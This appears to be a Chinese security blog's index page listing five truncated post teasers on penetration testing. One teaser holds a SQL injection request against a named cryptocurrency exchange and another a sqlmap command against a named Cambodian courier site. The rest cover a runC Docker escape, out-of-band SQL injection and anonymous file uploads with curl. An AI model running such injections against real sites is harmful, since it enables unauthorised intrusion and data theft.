2022-04-02 对ftftx的渗透测试 实战渗透渗透测试 实战渗透 目标: 前台地址:FTFTX-全球数字货币交易所综合平台排行 漏洞地址: SQL包情况:1234567891011121314151617GET /ad/queryAll?position=index%27and%27e%27%3D%27
2022-03-31 对柬埔寨申通的实战渗透 SQL注入实战渗透 渗透测试 1sqlmap -u "http://www.stocambodia.com/search.php?act=detail&bglxid=972%E9%8E%88%27%22%5C%28&cc=41111111111
2022-03-31 Docker逃逸复现 实战渗透漏洞复现虚拟逃逸 渗透测试 漏洞简述:攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。 利用条件:Docker版本 < 18.09.2,runC版本<
2022-03-31 利用DN实现的SQL注入外带查询 利用方式实战渗透渗透技巧 渗透测试 根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inference(经典SQL注入),inband(盲注、推理注入、带内注入)和out-of-band 一、什么是OOBout-of-band带外数据(OOB)与inband相反,它
2022-03-31 实战中的匿名文件传输 实战渗透渗透测试 匿名传输 # Upload using cURL $ curl –upload-file ./hello.txt https://transfer.sh/hello.txt https://transfer.sh/YD2SwK/he